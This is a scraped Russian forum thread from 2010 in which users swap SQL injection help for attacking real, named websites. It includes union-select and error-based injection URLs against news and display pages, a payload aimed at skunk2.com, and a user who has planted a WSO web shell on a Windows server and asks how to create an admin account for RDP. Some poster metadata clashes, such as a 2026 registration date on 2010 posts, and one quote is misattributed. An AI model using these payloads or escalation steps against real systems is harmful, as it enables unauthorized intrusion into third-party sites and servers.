HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15081  
Старый 19.09.2010, 16:44
Blizzard
Guest
Сообщений: n/a
Провел на форуме:
3507

Репутация: 0
По умолчанию

Цитата:
Сообщение от 547  
547 said:
как узнать список таблиц из определенной бд?
я пробовал чтото вроде этого
http://www.ччч.ru/news.php?id=-45+union+select+1,2,3,4,5,unhex%28hex%28group_conc at%28table_name%29%29%29,7,8,9,10+from+information _schema.schemata+where+schema_name=0x00000000
невыйшло..
from+information_schema.tables+where+table_schema= 0x000
 
Ответить с цитированием

  #15082  
Старый 19.09.2010, 16:57
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

547

1) кавычки хексить/чарить не надо;

2) если бока, то тащи с INFORMATION_SCHEMA.COLUMNS->TABLE_NAME

или Mysql->columns_priv-> Table_name если возможно.
 
Ответить с цитированием

  #15083  
Старый 19.09.2010, 20:20
SofiaLoar
Новичок
Регистрация: 26.04.2026
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция' LIKE CONCAT('%',url,'%')

как раскрутить?
 
Ответить с цитированием

  #15084  
Старый 19.09.2010, 21:18
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Strilo4ka  
Strilo4ka said:
Код:
Code:
http://www.skunk2.com/news2.php?news_id=43%20or%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28version%28%29,floor%28rand%280%29*2%29%29%29--
4.1.221
эфект тот же....
 
Ответить с цитированием

  #15085  
Старый 19.09.2010, 21:31
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235

Репутация: 39
По умолчанию

если с

/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...
 
Ответить с цитированием

  #15086  
Старый 19.09.2010, 21:47
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию

Цитата:
Сообщение от roddik  
roddik said:
если с
/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...
Так сложно сказать.. кидай в личку сылку если хочешь.. надо смотреть..
 
Ответить с цитированием

  #15087  
Старый 19.09.2010, 22:48
SofiaLoar
Новичок
Регистрация: 26.04.2026
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Strilo4ka  
Strilo4ka said:
интересно
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1/*
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1--
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1#
Это всё уже попробовал,не катит. Пишет

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1
 
Ответить с цитированием

  #15088  
Старый 19.09.2010, 22:50
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию

Цитата:
Сообщение от Darth Padla  
Darth Padla said:
Это всё уже попробовал,не катит. Пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1
ну могу тебе сказать тока как и предыдущему человеку кидай сыль в личку... ему ответ кинул надеюсь поможет ... если смогу и тебе помогу..
 
Ответить с цитированием

  #15089  
Старый 20.09.2010, 01:54
SofiaLoar
Новичок
Регистрация: 26.04.2026
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

А почему в личку?мне не жалко,просто из принципа раскрутить хочется.

view-source:http://znakomye.ru/news.php?дальше скуля
 
Ответить с цитированием

  #15090  
Старый 20.09.2010, 08:58
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Народ, такой вопрос.

Вообщем залил шел wso2 на win2k3 имею полный доступ ко всему что находится на винте.

Как через шелл создать юзера и добавить его в группу админов что бы я мог зайти на RDP ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ